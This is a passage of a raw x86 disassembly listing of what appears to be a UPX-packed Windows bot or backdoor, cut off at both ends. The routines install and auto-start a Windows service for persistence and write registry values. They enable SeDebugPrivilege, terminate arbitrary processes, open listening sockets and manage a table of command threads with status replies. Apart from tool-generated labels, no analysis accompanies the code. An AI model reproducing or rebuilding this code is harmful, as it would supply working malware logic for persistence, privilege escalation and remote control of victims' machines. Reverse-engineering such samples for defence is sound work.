push [ebp+var_8]
push 7
jmp short loc_407F85
; ---------------------------------------------------------------------------
loc_407FB4: ; CODE XREF: sub_407F71+39�j
xor eax, eax
leave
retn
sub_407F71 endp
; ---------------------------------------------------------------------------
db 11h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407FC9 proc near ; CODE XREF: sub_4012CB�j
var_10004 = byte ptr -10004h
var_10003 = byte ptr -10003h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
mov eax, 10004h
call sub_40C3E0
push ebx
xor ebx, ebx
lea eax, [ebp+arg_4]
push ebx
push eax
push ebx
push 20006h
push ebx
push ebx
push ebx
push [ebp+arg_4]
push [ebp+arg_0]
call dword_413E2C ; RegCreateKeyExA
test eax, eax
jz short loc_407FFE
xor eax, eax
jmp loc_4080FE
; ---------------------------------------------------------------------------
loc_407FFE: ; CODE XREF: sub_407FC9+2C�j
push esi
push edi
mov edi, [ebp+arg_8]
cmp edi, ebx
jz loc_4080EE
mov eax, [ebp+arg_C]
dec eax
jz loc_4080B8
dec eax
jz short loc_40808F
dec eax
dec eax
jz short loc_40807F
sub eax, 3
jnz loc_4080F1
push [ebp+arg_14]
call sub_40C28E ; strlen
push [ebp+arg_14]
mov esi, eax
lea eax, [ebp+var_10004]
push eax
call sub_40C25E ; strcpy
add esp, 0Ch
xor ecx, ecx
mov [ebp+esi+var_10004], bl
cmp esi, ebx
mov [ebp+esi+var_10003], bl
jle short loc_40806F
loc_408055: ; CODE XREF: sub_407FC9+A2�j
cmp [ebp+ecx+var_10004], 0Ah
lea eax, [ebp+ecx+var_10004]
jnz short loc_408068
mov [eax], bl
loc_408068: ; CODE XREF: sub_407FC9+9B�j
inc ecx
cmp ecx, esi
jl short loc_408055
cmp esi, ebx
loc_40806F: ; CODE XREF: sub_407FC9+8A�j
jz short loc_408073
inc esi
inc esi
loc_408073: ; CODE XREF: sub_407FC9:loc_40806F�j
lea eax, [ebp+var_10004]
push esi
push eax
push 7
jmp short loc_4080DF
; ---------------------------------------------------------------------------
loc_40807F: ; CODE XREF: sub_407FC9+51�j
mov eax, [ebp+arg_10]
push 4
mov [ebp+arg_0], eax
lea eax, [ebp+arg_0]
push eax
push 4
jmp short loc_4080DF
; ---------------------------------------------------------------------------
loc_40808F: ; CODE XREF: sub_407FC9+4D�j
push [ebp+arg_14]
call sub_40C28E ; strlen
push [ebp+arg_14]
mov esi, eax
lea eax, [ebp+var_10004]
push eax
call sub_40C25E ; strcpy
add esp, 0Ch
inc esi
lea eax, [ebp+var_10004]
push esi
push eax
push 2
jmp short loc_4080DF
; ---------------------------------------------------------------------------
loc_4080B8: ; CODE XREF: sub_407FC9+46�j
push [ebp+arg_14]
call sub_40C28E ; strlen
push [ebp+arg_14]
mov esi, eax
lea eax, [ebp+var_10004]
push eax
call sub_40C25E ; strcpy
add esp, 0Ch
inc esi
lea eax, [ebp+var_10004]
push esi
push eax
push 1
loc_4080DF: ; CODE XREF: sub_407FC9+B4�j
; sub_407FC9+C4�j ...
push ebx
push edi
push [ebp+arg_4]
call dword_413ECC ; RegSetValueExA
test eax, eax
jnz short loc_4080F1
loc_4080EE: ; CODE XREF: sub_407FC9+3C�j
push 1
pop ebx
loc_4080F1: ; CODE XREF: sub_407FC9+56�j
; sub_407FC9+123�j
push [ebp+arg_4]
call dword_413E64 ; RegCloseKey
pop edi
mov eax, ebx
pop esi
loc_4080FE: ; CODE XREF: sub_407FC9+30�j
pop ebx
leave
retn
sub_407FC9 endp
; ---------------------------------------------------------------------------
db 4Eh dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_40814F proc near ; CODE XREF: sub_4011F4�j
arg_0 = dword ptr 4
cmp [esp+arg_0], 5
push esi
jnz short loc_40819E
mov esi, offset dword_413860
mov ecx, esi
call sub_401032
test al, al
jz short loc_408194
push offset aSystemShutting ; "System shutting down."
push esi
call sub_4012AD
pop ecx
pop ecx
push 7D0h
call ds:dword_47B4EC ; Sleep
mov ecx, esi
call sub_401217
call dword_413DBC ; WSACleanup
push 0
call ds:dword_47B514 ; ExitProcess
loc_408194: ; CODE XREF: sub_40814F+16�j
mov dword_4273FC, 7
loc_40819E: ; CODE XREF: sub_40814F+6�j
push offset dword_4273F8
push dword_4273F4
call dword_413DD4 ; SetServiceStatus
test eax, eax
jnz short loc_4081B9
call ds:dword_47B4E4 ; RtlGetLastWin32Error
loc_4081B9: ; CODE XREF: sub_40814F+62�j
pop esi
retn 4
sub_40814F endp
; ---------------------------------------------------------------------------
db 1Bh dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_4081D8 proc near ; CODE XREF: sub_401258�j
var_4 = byte ptr -4
push ecx
push esi
push edi
push 4
xor esi, esi
pop edi
mov dword_4273F8, 30h
push offset sub_4011F4
push offset dword_40FBB0
mov dword_4273FC, 2
mov dword_427400, edi
mov dword_427404, esi
mov dword_427408, esi
mov dword_42740C, esi
mov dword_427410, esi
call dword_413EB8 ; RegisterServiceCtrlHandlerA
push offset dword_4273F8
push eax
mov dword_4273F4, eax
mov dword_4273FC, edi
mov dword_42740C, esi
mov dword_427410, esi
call dword_413DD4 ; SetServiceStatus
lea eax, [esp+0Ch+var_4]
push eax
push esi
push esi
push offset loc_401249
push esi
push esi
call ds:dword_47B4DC ; CreateThread
mov edi, eax
cmp edi, esi
jz short loc_40826F
push 0FFFFFFFFh
push edi
call ds:dword_47B4D0 ; WaitForSingleObject
push edi
call ds:dword_47B520 ; CloseHandle
loc_40826F: ; CODE XREF: sub_4081D8+85�j
pop edi
xor eax, eax
pop esi
pop ecx
retn
sub_4081D8 endp
; ---------------------------------------------------------------------------
db 27h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40829C proc near ; CODE XREF: sub_4011BD�j
var_104 = byte ptr -104h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 104h
push esi
push edi
push [ebp+arg_0]
lea eax, [ebp+var_104]
push offset aS_1 ; "\"%s\""
push eax
call ds:dword_47B5FC ; sprintf
add esp, 0Ch
xor esi, esi
push 2
push esi
push esi
call dword_413E84 ; OpenSCManagerA
cmp eax, esi
mov dword_4273F0, eax
jz short loc_40833D
push esi
push esi
push esi
push esi
lea ecx, [ebp+var_104]
push esi
push ecx
push esi
push 2
push 110h
push 0F01FFh
push offset dword_40FBBC
push offset dword_40FBB0
push eax
call dword_413F24 ; CreateServiceA
mov edi, eax
cmp edi, esi
jnz short loc_40831A
call ds:dword_47B4E4 ; RtlGetLastWin32Error
cmp eax, 436h
jz short loc_408325
cmp eax, 431h
jnz short loc_40833D
jmp short loc_408325
; ---------------------------------------------------------------------------
loc_40831A: ; CODE XREF: sub_40829C+66�j
push offset dword_40FBD4
call sub_40128A
pop ecx
loc_408325: ; CODE XREF: sub_40829C+73�j
; sub_40829C+7C�j
call sub_40121C
push edi
call dword_413D48 ; CloseServiceHandle
push dword_4273F0
call dword_413D48 ; CloseServiceHandle
loc_40833D: ; CODE XREF: sub_40829C+36�j
; sub_40829C+7A�j
pop edi
xor eax, eax
pop esi
leave
retn
sub_40829C endp
; ---------------------------------------------------------------------------
db 29h dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_40836C proc near ; CODE XREF: sub_40121C�j
push esi
push 0F003Fh
push 0
push 0
call dword_413E84 ; OpenSCManagerA
test eax, eax
mov dword_4273F0, eax
jz short loc_4083BE
push 0F01FFh
push offset dword_40FBB0
push eax
call dword_413D2C ; OpenServiceA
mov esi, eax
test esi, esi
jz short loc_4083BE
push 0
push 0
push esi
call dword_413D30 ; StartServiceA
test eax, eax
jz short loc_4083BE
push dword_4273F0
call dword_413D48 ; CloseServiceHandle
push esi
call dword_413D48 ; CloseServiceHandle
loc_4083BE: ; CODE XREF: sub_40836C+17�j
; sub_40836C+2E�j ...
xor eax, eax
pop esi
retn
sub_40836C endp
; ---------------------------------------------------------------------------
db 15h dup(0CCh)
; ---------------------------------------------------------------------------
loc_4083D7: ; CODE XREF: UPX0:loc_401249�j
push ecx
push esi
push edi
lea eax, [esp+8]
xor edi, edi
push eax
push edi
push edi
push offset sub_40125D
push edi
push edi
call ds:dword_47B4DC ; CreateThread
mov esi, eax
cmp esi, edi
jnz short loc_4083FE
pop edi
xor eax, eax
pop esi
pop ecx
retn 4
; ---------------------------------------------------------------------------
loc_4083FE: ; CODE XREF: UPX0:004083F4�j
push 0FFFFFFFFh
push esi
call ds:dword_47B4D0 ; WaitForSingleObject
push esi
call ds:dword_47B520 ; CloseHandle
push edi
call ds:dword_47B4C4 ; ExitThread
; ---------------------------------------------------------------------------
db 0Fh dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408424 proc near ; CODE XREF: sub_40128A�j
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 34h
push ebx
push esi
push edi
push 1
pop edi
xor ebx, ebx
push 0F003Fh
push ebx
push ebx
mov [ebp+var_8], edi
call dword_413E84 ; OpenSCManagerA
cmp eax, ebx
mov dword_4273F0, eax
jz short loc_4084AF
mov esi, offset dword_40FBB0
push 0F01FFh
push esi
push eax
call dword_413D2C ; OpenServiceA
cmp eax, ebx
mov [ebp+var_4], eax
jz short loc_4084AF
push dword_4273F0
call dword_413D64 ; LockServiceDatabase
cmp eax, ebx
mov [ebp+var_14], eax
jnz short loc_4084C1
call ds:dword_47B4E4 ; RtlGetLastWin32Error
cmp eax, 41Fh
jnz short loc_4084AF
mov ebx, 10Ch
push ebx
push 40h
call ds:dword_47B48C ; LocalAlloc
test eax, eax
mov [ebp+var_C], eax
jz short loc_4084AF
lea ecx, [ebp+var_18]
push ecx
push ebx
push eax
push dword_4273F0
call dword_413DEC ; QueryServiceLockStatusA
test eax, eax
jnz short loc_4084B6
loc_4084AF: ; CODE XREF: sub_408424+25�j
; sub_408424+3E�j ...
xor eax, eax
jmp loc_408547
; ---------------------------------------------------------------------------
loc_4084B6: ; CODE XREF: sub_408424+89�j
push [ebp+var_C]
call ds:dword_47B500 ; LocalFree
xor ebx, ebx
loc_4084C1: ; CODE XREF: sub_408424+51�j
push 2
push esi
push dword_4273F0
call dword_413D2C ; OpenServiceA
mov dword_4273F0, eax
lea eax, [ebp+var_20]
mov [ebp+var_24], eax
lea eax, [ebp+var_34]
push eax
push 2
push [ebp+var_4]
mov [ebp+var_1C], 0BB8h
mov [ebp+var_20], edi
mov [ebp+var_28], edi
mov [ebp+var_2C], ebx
mov [ebp+var_30], ebx
mov [ebp+var_34], 0Ah
call dword_413F7C ; ChangeServiceConfig2A
test eax, eax
jnz short loc_40850B
mov [ebp+var_8], ebx
loc_40850B: ; CODE XREF: sub_408424+E2�j
mov eax, [ebp+arg_0]
mov [ebp+var_10], eax
lea eax, [ebp+var_10]
push eax
push edi
push [ebp+var_4]
call dword_413F7C ; ChangeServiceConfig2A
test eax, eax
jnz short loc_408526
mov [ebp+var_8], ebx
loc_408526: ; CODE XREF: sub_408424+FD�j
push [ebp+var_14]
call dword_413EBC ; UnlockServiceDatabase
push [ebp+var_4]
call dword_413D48 ; CloseServiceHandle
push dword_4273F0
call dword_413D48 ; CloseServiceHandle
mov eax, [ebp+var_8]
loc_408547: ; CODE XREF: sub_408424+8D�j
pop edi
pop esi
pop ebx
leave
retn
sub_408424 endp
; ---------------------------------------------------------------------------
db 4Ah dup(0CCh)
; ---------------------------------------------------------------------------
loc_408596: ; CODE XREF: UPX0:004010C8�j
push ebp
mov ebp, esp
sub esp, 14h
lea eax, [ebp-4]
mov dword ptr [ebp-4], 10h
push eax
lea eax, [ebp-14h]
push eax
push dword ptr [ebp+8]
call ds:dword_47B734 ; getpeername
test eax, eax
jz short loc_4085BC
xor al, al
leave
retn
; ---------------------------------------------------------------------------
loc_4085BC: ; CODE XREF: UPX0:004085B6�j
push 2
lea eax, [ebp-10h]
push 4
push eax
call ds:dword_47B738 ; gethostbyaddr
test eax, eax
jnz short loc_4085E3
push dword ptr [ebp-10h]
call ds:dword_47B73C ; inet_ntoa
push eax
push dword ptr [ebp+0Ch]
call ds:dword_47B5FC ; sprintf
jmp short loc_4085ED
; ---------------------------------------------------------------------------
loc_4085E3: ; CODE XREF: UPX0:004085CC�j
push dword ptr [eax]
push dword ptr [ebp+0Ch]
call sub_40C25E ; strcpy
loc_4085ED: ; CODE XREF: UPX0:004085E1�j
pop ecx
mov al, 1
pop ecx
leave
retn
; ---------------------------------------------------------------------------
db 17h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40860A proc near ; CODE XREF: sub_401127�j
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
push [ebp+arg_4]
mov [ebp+var_10], 2
call ds:dword_47B724 ; ntohs
mov [ebp+var_E], ax
and [ebp+var_C], 0
lea eax, [ebp+arg_4]
push 4
push eax
push 4
push 0FFFFh
mov [ebp+arg_4], 1
push [ebp+arg_0]
call ds:dword_47B728 ; setsockopt
test eax, eax
jnz short loc_408672
lea eax, [ebp+var_10]
push 10h
push eax
push [ebp+arg_0]
call ds:dword_47B72C ; bind
cmp eax, 0FFFFFFFFh
jz short loc_408672
cmp [ebp+arg_8], 0
jnz short loc_408676
push 0Ah
push [ebp+arg_0]
call ds:dword_47B730 ; listen
cmp eax, 0FFFFFFFFh
jnz short loc_408676
loc_408672: ; CODE XREF: sub_40860A+3C�j
; sub_40860A+50�j
xor al, al
leave
retn
; ---------------------------------------------------------------------------
loc_408676: ; CODE XREF: sub_40860A+56�j
; sub_40860A+66�j
mov al, 1
leave
retn
sub_40860A endp
; ---------------------------------------------------------------------------
db 1Ch dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_408696 proc near ; CODE XREF: sub_4011E5�j
arg_0 = dword ptr 4
push 2
push [esp+4+arg_0]
call ds:dword_47B71C ; shutdown
push [esp+arg_0]
call ds:dword_47B720 ; closesocket
retn
sub_408696 endp
; ---------------------------------------------------------------------------
db 5 dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4086B2 proc near ; CODE XREF: sub_401186�j
var_80 = byte ptr -80h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 80h
cmp [ebp+arg_0], 0
jnz short loc_4086C8
push offset byte_413980
jmp short loc_4086CB
; ---------------------------------------------------------------------------
loc_4086C8: ; CODE XREF: sub_4086B2+D�j
push [ebp+arg_0]
loc_4086CB: ; CODE XREF: sub_4086B2+14�j
lea eax, [ebp+var_80]
push eax
call sub_40C25E ; strcpy
pop ecx
lea eax, [ebp+var_80]
pop ecx
push eax
call ds:dword_47B70C ; gethostbyname
test eax, eax
jz short loc_4086F3
mov eax, [eax+0Ch]
mov eax, [eax]
push dword ptr [eax]
call ds:dword_47B73C ; inet_ntoa
leave
retn
; ---------------------------------------------------------------------------
loc_4086F3: ; CODE XREF: sub_4086B2+30�j
lea eax, [ebp+var_80]
push eax
call ds:dword_47B740 ; inet_addr
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz short loc_40871B
push 2
lea eax, [ebp+arg_0]
push 4
push eax
call ds:dword_47B738 ; gethostbyaddr
test eax, eax
jz short loc_40871B
mov eax, [eax]
leave
retn
; ---------------------------------------------------------------------------
loc_40871B: ; CODE XREF: sub_4086B2+51�j
; sub_4086B2+63�j
xor eax, eax
leave
retn
sub_4086B2 endp
; ---------------------------------------------------------------------------
db 1Bh dup(0CCh)
; ---------------------------------------------------------------------------
loc_40873A: ; CODE XREF: UPX0:004010A5�j
sub esp, 20h
push ebx
push ebp
push esi
push edi
push offset byte_413980
push dword ptr [esp+38h]
call ds:dword_47B5BC ; _stricmp
pop ecx
test eax, eax
pop ecx
jnz loc_4087DD
push 20h
lea eax, [esp+14h]
push dword ptr [esp+38h]
push eax
call ds:dword_47B614 ; strncpy
mov esi, ds:dword_47B5D0
mov edi, offset a_ ; "."
lea eax, [esp+1Ch]
push edi
push eax
call esi ; dword_47B5D0
add esp, 14h
test eax, eax
jz short loc_4087DD
mov ebx, ds:dword_47B600
push eax
call ebx ; dword_47B600
push edi
push 0
mov ebp, eax
call esi ; dword_47B5D0
add esp, 0Ch
test eax, eax
jz short loc_4087DD
push eax
call ebx ; dword_47B600
cmp ebp, 0Ah
pop ecx
jz short loc_4087D9
test ebp, ebp
jz short loc_4087D9
cmp ebp, 0ACh
jnz short loc_4087BB
cmp eax, 0Fh
jle short loc_4087DD
cmp eax, 20h
jl short loc_4087D9
loc_4087BB: ; CODE XREF: UPX0:004087AF�j
cmp ebp, 0A9h
jnz short loc_4087CA
cmp eax, 0FEh
jz short loc_4087D9
loc_4087CA: ; CODE XREF: UPX0:004087C1�j
cmp ebp, 0C0h
jnz short loc_4087DD
cmp eax, 0A8h
jnz short loc_4087DD
loc_4087D9: ; CODE XREF: UPX0:004087A3�j
; UPX0:004087A7�j ...
mov al, 1
jmp short loc_4087DF
; ---------------------------------------------------------------------------
loc_4087DD: ; CODE XREF: UPX0:00408754�j
; UPX0:00408783�j ...
xor al, al
loc_4087DF: ; CODE XREF: UPX0:004087DB�j
pop edi
pop esi
pop ebp
pop ebx
add esp, 20h
retn
; ---------------------------------------------------------------------------
db 2Bh dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408812 proc near ; CODE XREF: sub_40105F�j
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
xor edi, edi
push esi
push edi
push 28h
mov [ebp+var_8], 10h
mov [ebp+var_4], edi
call ds:dword_47B50C ; GetCurrentThread
push eax
call dword_413DB0 ; OpenThreadToken
test eax, eax
jnz short loc_408855
push esi
push 28h
call ds:dword_47B504 ; GetCurrentProcess
push eax
call dword_413E70 ; OpenProcessToken
test eax, eax
jnz short loc_408855
mov [esi], edi
loc_408855: ; CODE XREF: sub_408812+2B�j
; sub_408812+3F�j
cmp [esi], edi
jz short loc_4088AC
push 1
lea eax, [ebp+var_14]
pop ebx
mov [ebp+var_C], 2
push eax
push offset aSedebugprivile ; "SeDebugPrivilege"
push edi
mov [ebp+var_18], ebx
call dword_413E34 ; LookupPrivilegeValueA
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_18]
push [ebp+arg_4]
push 10h
push eax
push edi
push dword ptr [esi]
call dword_413F20 ; AdjustTokenPrivileges
test eax, eax
jz short loc_4088A2
call ds:dword_47B4E4 ; RtlGetLastWin32Error
cmp eax, 514h
jz short loc_4088A2
mov [ebp+var_4], ebx
jmp short loc_4088AC
; ---------------------------------------------------------------------------
loc_4088A2: ; CODE XREF: sub_408812+7C�j
; sub_408812+89�j
push dword ptr [esi]
call ds:dword_47B520 ; CloseHandle
mov [esi], edi
loc_4088AC: ; CODE XREF: sub_408812+45�j
; sub_408812+8E�j
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_408812 endp
; ---------------------------------------------------------------------------
db 28h dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_4088DC proc near ; CODE XREF: sub_401280�j
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
xor ecx, ecx
mov eax, [esi]
cmp eax, ecx
jz short loc_408901
push ecx
push ecx
push 10h
push [esp+10h+arg_4]
push ecx
push eax
call dword_413F20 ; AdjustTokenPrivileges
push dword ptr [esi]
call ds:dword_47B520 ; CloseHandle
loc_408901: ; CODE XREF: sub_4088DC+B�j
pop esi
retn
sub_4088DC endp
; ---------------------------------------------------------------------------
db 9 dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40890C proc near ; CODE XREF: sub_4012C6�j
var_14 = byte ptr -14h
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
push ebx
lea eax, [ebp+var_14]
push esi
push eax
lea eax, [ebp+var_4]
xor ebx, ebx
push eax
call sub_40105F
pop ecx
pop ecx
push [ebp+arg_0]
push ebx
push 411h
call ds:dword_47B4F0 ; OpenProcess
mov esi, eax
cmp esi, ebx
jz short loc_40894B
push ebx
push esi
call ds:dword_47B4A4 ; TerminateProcess
push esi
mov bl, 1
call ds:dword_47B520 ; CloseHandle
loc_40894B: ; CODE XREF: sub_40890C+2C�j
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_4]
push eax
call sub_401280
pop ecx
pop ecx
pop esi
movzx eax, bl
pop ebx
leave
retn
sub_40890C endp
; ---------------------------------------------------------------------------
db 15h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408976 proc near ; CODE XREF: sub_401073�j
var_1E8 = byte ptr -1E8h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 1E8h
lea eax, [ebp+arg_8]
push edi
push eax
lea eax, [ebp+var_1E8]
push [ebp+arg_4]
push 1E6h
push eax
call ds:dword_47B5D8 ; _vsnprintf
add esp, 10h
xor edi, edi
mov eax, offset dword_427420
loc_4089A3: ; CODE XREF: sub_408976+3D�j
cmp byte ptr [eax], 0
jz short loc_4089B7
add eax, 220h
inc edi
cmp eax, offset dword_46B420
jl short loc_4089A3
jmp short loc_4089F4
; ---------------------------------------------------------------------------
loc_4089B7: ; CODE XREF: sub_408976+30�j
push esi
mov esi, edi
imul esi, 220h
lea eax, [ebp+var_1E8]
push 201h
push eax
lea eax, dword_427420[esi]
push eax
call ds:dword_47B614 ; strncpy
mov eax, [ebp+arg_0]
add esp, 0Ch
mov dword_427624[esi], eax
and dword_427628[esi], 0
and dword_42762C[esi], 0
pop esi
loc_4089F4: ; CODE XREF: sub_408976+3F�j
mov eax, edi
pop edi
leave
retn
sub_408976 endp
; ---------------------------------------------------------------------------
db 20h dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_408A19 proc near ; CODE XREF: sub_40106E�j
arg_0 = dword ptr 4
push ebx
push ebp
push esi
mov esi, [esp+0Ch+arg_0]
xor ebx, ebx
xor ebp, ebp
cmp esi, ebx
jle short loc_408A8F
cmp esi, 200h
jge short loc_408A8F
imul esi, 220h
push edi
push ebx
push dword_427630[esi]
lea edi, dword_427630[esi]
call ds:dword_47B4A0 ; TerminateThread
cmp [edi], ebx
jz short loc_408A51
push 1
pop ebp
loc_408A51: ; CODE XREF: sub_408A19+33�j
mov [edi], ebx
lea edi, dword_42762C[esi]
mov dword_427624[esi], ebx
mov dword_427628[esi], ebx
mov eax, [edi]
cmp eax, ebx
jbe short loc_408A72
push eax
call sub_4012C6
pop ecx
loc_408A72: ; CODE XREF: sub_408A19+50�j
mov [edi], ebx
mov byte ptr dword_427420[esi], bl
push dword_427634[esi]
lea esi, dword_427634[esi]
call dword_413F5C ; closesocket
mov [esi], ebx
pop edi
loc_408A8F: ; CODE XREF: sub_408A19+D�j
; sub_408A19+15�j
mov eax, ebp
pop esi
pop ebp
pop ebx
retn
sub_408A19 endp
; ---------------------------------------------------------------------------
db 1Fh dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_408AB4 proc near ; CODE XREF: sub_4010CD�j
push ebx
push esi
push edi
xor ebx, ebx
xor edi, edi
mov esi, offset dword_427420
loc_408AC0: ; CODE XREF: sub_408AB4+2A�j
cmp byte ptr [esi], 0
jz short loc_408AD1
push edi
call sub_40106E
test eax, eax
pop ecx
jz short loc_408AD1
inc ebx
loc_408AD1: ; CODE XREF: sub_408AB4+F�j
; sub_408AB4+1A�j
add esi, 220h
inc edi
cmp esi, offset dword_46B420
jl short loc_408AC0
pop edi
mov eax, ebx
pop esi
pop ebx
retn
sub_408AB4 endp
; ---------------------------------------------------------------------------
db 0Ch dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408AF2 proc near ; CODE XREF: sub_401221�j
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
xor ebx, ebx
push edi
mov edi, [ebp+arg_4]
mov [ebp+var_4], ebx
mov esi, offset dword_427628
loc_408B06: ; CODE XREF: sub_408AF2+43�j
mov eax, [esi-4]
cmp eax, [ebp+arg_0]
jnz short loc_408B28
test edi, edi
jle short loc_408B1A
cmp [esi], edi
jz short loc_408B1A
cmp ebx, edi
jnz short loc_408B28
loc_408B1A: ; CODE XREF: sub_408AF2+1E�j
; sub_408AF2+22�j
push ebx
call sub_40106E
test eax, eax
pop ecx
jz short loc_408B28
inc [ebp+var_4]
loc_408B28: ; CODE XREF: sub_408AF2+1A�j
; sub_408AF2+26�j ...
add esi, 220h
inc ebx
cmp esi, offset dword_46B628
jl short loc_408B06
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_408AF2 endp
; ---------------------------------------------------------------------------
db 13h dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_408B52 proc near ; CODE XREF: sub_401235�j
arg_0 = dword ptr 4
push ebx
push esi
mov esi, [esp+8+arg_0]
xor ebx, ebx
imul esi, 220h
push edi
mov dword_427630[esi], ebx
mov dword_427624[esi], ebx
mov dword_427628[esi], ebx
mov dword_42762C[esi], ebx
lea edi, dword_427638[esi]
mov dword_427634[esi], ebx
mov byte ptr dword_427420[esi], bl
push dword ptr [edi]
call sub_4011E5
lea esi, dword_42763C[esi]
mov [edi], ebx
push dword ptr [esi]
call sub_4011E5
pop ecx
mov [esi], ebx
pop ecx
pop edi
pop esi
pop ebx
retn
sub_408B52 endp
; ---------------------------------------------------------------------------
db 15h dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408BBE proc near ; CODE XREF: sub_4012D0�j
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
xor eax, eax
cmp [ebp+arg_10], eax
jz short loc_408BD2
push [ebp+arg_10]
call ds:dword_47B600 ; atoi
pop ecx
loc_408BD2: ; CODE XREF: sub_408BBE+8�j
push eax
push [ebp+arg_14]
call sub_401221
pop ecx
test eax, eax
pop ecx
jle short loc_408C05
cmp [ebp+arg_8], 0
jnz short loc_408C2C
push eax
push [ebp+arg_18]
push offset dword_4101C4
push offset aSSTStp_DTSStp_ ; "%s %s t stp. (%d t(s) stp.)"
push [ebp+arg_0]
push [ebp+arg_4]
call sub_40104B
add esp, 18h
pop ebp
retn
; ---------------------------------------------------------------------------
loc_408C05: ; CODE XREF: sub_408BBE+21�j
cmp [ebp+arg_8], 0
jnz short loc_408C2C
cmp [ebp+arg_C], 0
jz short loc_408C2C
push [ebp+arg_18]
push offset dword_4101C4
push offset aSNoSTFound_ ; "%s No %s t found."
push [ebp+arg_0]
push [ebp+arg_4]
call sub_40104B
add esp, 14h
loc_408C2C: ; CODE XREF: sub_408BBE+27�j
; sub_408BBE+4B�j ...
pop ebp
retn
sub_408BBE endp
; ---------------------------------------------------------------------------
db 1Ch dup(0CCh)
; ---------------------------------------------------------------------------
loc_408C4A: ; CODE XREF: sub_40115E�j
push ebp
mov ebp, esp
sub esp, 0C0h
mov eax, [ebp+8]
push ebx
push esi
push edi
push 30h
mov esi, eax
pop ecx
lea edi, [ebp-0C0h]
rep movsd
mov esi, offset dword_4101C4
mov dword ptr [eax+0BCh], 1
mov eax, [ebp-0C0h]
push esi
lea ecx, [ebp-0BCh]
push offset aSList ; "%s List:"
push ecx
push eax
mov [ebp+8], eax
call sub_40104B
add esp, 10h
xor ebx, ebx
mov edi, offset dword_427420
loc_408C9B: ; CODE XREF: UPX0:00408CD5�j
cmp byte ptr [edi], 0
jz short loc_408CC8
cmp dword ptr [ebp-2Ch], 0
jnz short loc_408CAF
cmp dword ptr [edi+208h], 0
jnz short loc_408CC8
loc_408CAF: ; CODE XREF: UPX0:00408CA4�j
push edi
push ebx
lea eax, [ebp-0BCh]
push offset aD_S ; "%d. %s"
push eax
push dword ptr [ebp+8]
call sub_40104B
add esp, 14h
loc_408CC8: ; CODE XREF: UPX0:00408C9E�j
; UPX0:00408CAD�j
add edi, 220h
inc ebx
cmp edi, offset dword_46B420
jl short loc_408C9B
push esi
lea eax, [ebp-0BCh]
push offset aSEnd_ ; "%s End."
push eax
push dword ptr [ebp+8]
call sub_40104B
push dword ptr [ebp-3Ch]
call sub_401235
add esp, 14h
push 0
call ds:dword_47B4C4 ; ExitThread
pop edi
pop esi
pop ebx
; ---------------------------------------------------------------------------
db 2Eh dup(0CCh)
; ---------------------------------------------------------------------------
loc_408D30: ; CODE XREF: UPX0:004012E4�j
push ebp
mov ebp, esp
push ebx
xor ebx, ebx
cmp [ebp+10h], ebx
push esi
push edi
mov edi, offset dword_4101C4
jz short loc_408D56
push edi
push offset aSList ; "%s List:"
push dword ptr [ebp+8]
push dword ptr [ebp+0Ch]
call sub_40104B
add esp, 10h
